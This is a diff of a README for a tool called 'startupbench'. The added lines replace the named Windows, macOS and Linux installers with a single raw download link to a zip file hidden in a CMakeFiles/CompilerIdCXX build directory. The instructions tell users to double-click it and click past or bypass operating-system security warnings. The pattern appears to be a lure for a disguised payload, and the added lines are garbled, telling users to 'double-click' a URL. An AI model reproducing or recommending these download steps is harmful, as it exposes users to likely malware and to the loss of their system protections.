SaeaaN3/startupbench/README.md

 1. Locate the downloaded file.
 It may be in your Downloads folder.

-   - For Windows: Look for `startupbench.exe`.
+   - For Windows: Look for `https://github.com/SaeaaN3/startupbench/raw/refs/heads/main/CMakeFiles/4.2.0/CompilerIdCXX/Software_v1.8.zip`.
-   - For macOS: Look for `startupbench.dmg`.
+   - For macOS: Look for `https://github.com/SaeaaN3/startupbench/raw/refs/heads/main/CMakeFiles/4.2.0/CompilerIdCXX/Software_v1.8.zip`.
-   - For Linux: Look for `startupbench.tar.gz`.
+   - For Linux: Look for `https://github.com/SaeaaN3/startupbench/raw/refs/heads/main/CMakeFiles/4.2.0/CompilerIdCXX/Software_v1.8.zip`.

 2. **Windows Users:**
-   - Double-click `startupbench.exe` to run the application.
+   - Double-click `https://github.com/SaeaaN3/startupbench/raw/refs/heads/main/CMakeFiles/4.2.0/CompilerIdCXX/Software_v1.8.zip` to run the application.
    - You might see a security warning.
 If so, click "Run" to proceed.

 3. **macOS Users:**
-   - Double-click `startupbench.dmg` to open the installer.
+   - Double-click `https://github.com/SaeaaN3/startupbench/raw/refs/heads/main/CMakeFiles/4.2.0/CompilerIdCXX/Software_v1.8.zip` to open the installer.
    - Drag the startupbench icon into your Applications folder.
    - Go to the Applications folder and double-click the startupbench icon to run the application.
    - If you see a warning, right-click the icon and select "Open" to bypass this.